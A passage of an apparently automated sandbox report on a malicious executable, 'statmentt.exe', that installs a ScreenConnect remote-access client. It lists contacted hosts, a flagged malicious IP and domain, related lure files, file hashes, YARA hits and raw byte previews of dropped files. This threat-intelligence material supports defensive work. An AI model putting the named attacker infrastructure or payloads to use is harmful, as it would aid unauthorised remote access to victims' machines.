  Sources: rundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp; rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp; rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp; Microsoft.Deployment.WindowsInstaller.dll.4.dr; Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr; Microsoft.Deployment.Compression.dll.4.dr; Microsoft.Deployment.Compression.Cab.dll.4.dr
  Malicious: false | Antivirus Detection: | Reputation: high
https://feedback.screenconnect.com/Feedback.axd
  Sources: ScreenConnect.Core.dll.2.dr
  Malicious: false | Antivirus Detection: | Reputation: high
https://docs.rs/getrandom#nodejs-es-module-support
  Sources: ScreenConnect.WindowsCredentialProvider.dll.2.dr
  Malicious: false | Antivirus Detection: | Reputation: high
IPs
IP | Domain | Country | ASN | ASN Name | Malicious
85.239.34.190 | yell64u.top | Russian Federation | 134121 | RAINBOW-HK Rainbownetworklimited HK | true
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1578432
                                            Start date and time:2024-12-19 17:28:07 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 21s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:14
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:statmentt.exe
                                            Detection:MAL
                                            Classification:mal48.evad.winEXE@17/56@1/1
                                            EGA Information:
                                            • Successful, ratio: 60%
                                            HCA Information:
                                            • Successful, ratio: 79%
                                            • Number of executed functions: 225
                                            • Number of non-executed functions: 1
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target rundll32.exe, PID 7632 because it is empty
                                            • Execution Graph export aborted for target statmentt.exe, PID 7408 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • VT rate limit hit for: statmentt.exe
                                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
85.239.34.190 | statsment.exe | malicious | ScreenConnect Tool |
85.239.34.190 | setup.msi | malicious | ScreenConnect Tool |
85.239.34.190 | statments.exe | malicious | ScreenConnect Tool |
85.239.34.190 | sstatment.exe | malicious | ScreenConnect Tool |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
yell64u.top | statsment.exe | malicious | ScreenConnect Tool | 85.239.34.190
yell64u.top | setup.msi | malicious | ScreenConnect Tool | 85.239.34.190
yell64u.top | statments.exe | malicious | ScreenConnect Tool | 85.239.34.190
yell64u.top | sstatment.exe | malicious | ScreenConnect Tool | 85.239.34.190
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RAINBOW-HKRainbownetworklimitedHK | ppc.elf | malicious | Mirai | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | sh4.elf | malicious | Mirai | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | mips.elf | malicious | Mirai | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | spc.elf | malicious | Mirai | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | arm6.elf | malicious | Mirai | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | arm.elf | malicious | Mirai | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | m68k.elf | malicious | Mirai | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | arm7.elf | malicious | Mirai | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | x86.elf | malicious | Mirai | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | mpsl.elf | malicious | Mirai | 85.239.34.134
                                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | support.Client.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | statsment.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | file.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | setup.msi | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | pzPO97QouM.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | pzPO97QouM.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | support.Client.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | statsment.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | file.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | setup.msi | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | pzPO97QouM.exe | malicious | ScreenConnect Tool |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | pzPO97QouM.exe | malicious | ScreenConnect Tool |
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):219646
                                                                                            Entropy (8bit):6.5820771589175235
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:85Z9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGEd:85ZuH2aCGw1ST1wQLdqvEd
                                                                                            MD5:0E9702E471E40BC4ACBB2C863E0A27D4
                                                                                            SHA1:A186142117E5DA8B3FF44B0C133B7C949E2EDCE2
                                                                                            SHA-256:93E09E36B87DB3D31C142660401C1821B3DF09EC0FAE835E2517D71244422694
                                                                                            SHA-512:91462330C5EC940852320BDD73A7C6F38BEF9AC7F3B84F45C29555AB9E412E1A36A87126433E47645BCF7077E1B0C231BABB0D33CEE2955CCB80ECD8D5132AD9
                                                                                            Malicious:false
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\68f19a.rbs, Author: Joe Security
                                                                                            Preview:...@IXOS.@.....@.[.Y.@.....@.....@.....@.....@.....@......&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@......&.{E2565D0B-BCDD-C1A1-A2A2-7660FC61A23D}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@......&.{A9BEA7A3-6285-A159-CBF3-596C269E6678}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@......&.{567A6AC5-C59B-6D1E-4D5E-D3E6B358A6AB}&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.@....
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):652
                                                                                            Entropy (8bit):4.646296001566109
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                                            MD5:8B45555EF2300160892C25F453098AA4
                                                                                            SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                                            SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                                            SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                                            Malicious:false
                                                                                            Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):21018
                                                                                            Entropy (8bit):7.841465962209068
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                                            MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                                            SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                                            SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                                            SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                                            Malicious:false
                                                                                            Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):50133
                                                                                            Entropy (8bit):4.759054454534641
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                            MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                            SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                            SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                            SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                            Malicious:false
                                                                                            Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):26722
                                                                                            Entropy (8bit):7.7401940386372345
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                            MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                            SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                            SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                            SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                            Malicious:false
                                                                                            Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):197120
                                                                                            Entropy (8bit):6.58476728626163
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                            MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                            SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                            SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                            SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: statsment.exe, Detection: malicious, Browse
                                                                                            • Filename: , Detection: malicious, Browse
                                                                                            • Filename: , Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: setup.msi, Detection: malicious, Browse
                                                                                            • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                            • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):68096
                                                                                            Entropy (8bit):6.068776675019683
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                            MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                            SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                            SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                            SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: statsment.exe, Detection: malicious, Browse
                                                                                            • Filename: , Detection: malicious, Browse
                                                                                            • Filename: , Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: setup.msi, Detection: malicious, Browse
                                                                                            • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                                            • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                            • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):95520
                                                                                            Entropy (8bit):6.505346220942731
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                            MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                            SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                            SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                            SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):548864
                                                                                            Entropy (8bit):6.031251664661689
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                            MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                            SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                            SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                            SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1721856
                                                                                            Entropy (8bit):6.639136400085158
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                            MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                            SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                            SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                            SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):260168
                                                                                            Entropy (8bit):6.416438906122177
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                            MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                            SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                            SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                            SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                            Malicious:false
                                                                                            Antivirus:
